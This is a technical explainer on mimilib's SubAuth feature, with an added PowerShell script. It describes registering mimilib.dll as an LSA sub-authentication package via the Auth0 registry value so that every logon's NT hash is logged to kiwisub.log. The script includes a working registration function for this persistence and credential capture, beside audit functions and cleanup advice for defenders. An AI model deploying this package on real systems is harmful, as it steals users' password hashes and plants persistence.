How does the SubAuth feature of mimilib work and what information does it log?
The SubAuth feature relies on the two sub-authentication exports that Windows documents for LSA packages: `Msv1_0SubAuthenticationRoutine` (called by MSV1_0 for NTLM logons) and `Msv1_0SubAuthenticationFilter` (called by Kerberos on a domain controller). To deploy it, copy mimilib.dll (matching the OS bitness) into `%SystemRoot%\System32` and create a REG_SZ value named `Auth0` whose data is the DLL's base name (`mimilib`) under `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0` (use the sibling `\Kerberos` key on a domain controller). Both steps need administrative rights, and because lsass.exe only loads sub-authentication packages at start-up, a reboot is required. From then on every logon that passes through the package is appended to `kiwisub.log`, recording UserId, PrimaryGroupId, LogonDomainName, UserName, Workstation, BadPasswordCount, and the account's NT hash, which makes this both a persistence mechanism and a credential-capture one. The log entries carry no timestamp by default; that can be added by modifying the source in the mimilib GitHub repository and rebuilding. Defensively, an unexpected `Auth<n>` value under either key, or a `kiwisub.log` in System32, is the artefact to look for.
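The deployment steps above, together with the audit a defender would run against them, as an added PowerShell example (this is not code from mimikatz/mimilib or from the original page). It assumes, beyond what the page states, that the `Auth0` data is the DLL base name without extension, that `kiwisub.log` ends up in `System32` because that is lsass.exe's working directory, and that the functions and parameter names shown are hypothetical helpers written for this illustration.

```powershell
# Added example, not from the mimilib project. Registers a sub-authentication package the way
# the page describes and audits a host for such registrations. Run from an elevated prompt.
# Assumptions: Auth0 holds the DLL base name ("mimilib"); kiwisub.log lands in System32
# because that is lsass.exe's working directory; function names below are hypothetical.

$MsvKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0'
$KrbKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos'

function Register-SubAuthPackage {
    param(
        [Parameter(Mandatory)] [string] $DllPath,   # e.g. C:\tools\mimilib.dll (must match OS bitness)
        [switch] $DomainController                   # register under the Kerberos key on a DC
    )
    $key  = if ($DomainController) { $KrbKey } else { $MsvKey }
    $name = [IO.Path]::GetFileNameWithoutExtension($DllPath)

    Copy-Item -Path $DllPath -Destination (Join-Path $env:SystemRoot 'System32') -Force
    New-ItemProperty -Path $key -Name 'Auth0' -PropertyType String -Value $name -Force | Out-Null

    # lsass.exe only loads sub-authentication packages at start-up: nothing is logged until a reboot.
    Get-ItemProperty -Path $key -Name 'Auth0' | Select-Object PSPath, Auth0
}

function Get-SubAuthPackages {
    # Audit: enumerate every Auth<n> value under both keys and resolve each to a DLL on disk.
    # A default install normally has no such values, so anything listed deserves a look.
    foreach ($key in $MsvKey, $KrbKey) {
        if (-not (Test-Path $key)) { continue }
        $props = Get-ItemProperty -Path $key
        foreach ($p in $props.PSObject.Properties) {
            if ($p.Name -notmatch '^Auth\d+$') { continue }   # skip PSPath/PSParentPath etc.
            $dll = Join-Path $env:SystemRoot ('System32\{0}.dll' -f $p.Value)
            [pscustomobject]@{
                Key     = $key
                Value   = $p.Name
                Package = $p.Value
                Path    = $dll
                Exists  = Test-Path $dll
                Signer  = if (Test-Path $dll) { (Get-AuthenticodeSignature $dll).Status } else { 'n/a' }
            }
        }
    }
}

function Test-KiwiSubLog {
    # Second artefact from the page: the log mimilib appends to on every logon it sees.
    $log = Join-Path $env:SystemRoot 'System32\kiwisub.log'
    if (Test-Path $log) {
        Get-Item $log | Select-Object FullName, Length, LastWriteTime
    }
}

# Usage (elevated):
#   Register-SubAuthPackage -DllPath C:\tools\mimilib.dll        # add -DomainController on a DC
#   Get-SubAuthPackages | Format-Table -AutoSize
#   Test-KiwiSubLog
```

`Get-SubAuthPackages` is the part worth scheduling on endpoints: it costs one registry read per key, and an unsigned or missing DLL behind an `Auth<n>` value is a strong signal. Deleting the value and the DLL, then rebooting, removes the package; the `kiwisub.log` it left behind should be collected before it is cleaned up, since it contains NT hashes that must be treated as compromised.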
Tags: mimilib, SubAuth, SubAuthentication, login logging, kiwisub, MSV1_0, Kerberos, credential logging
Source: Mimilib Usage Analysis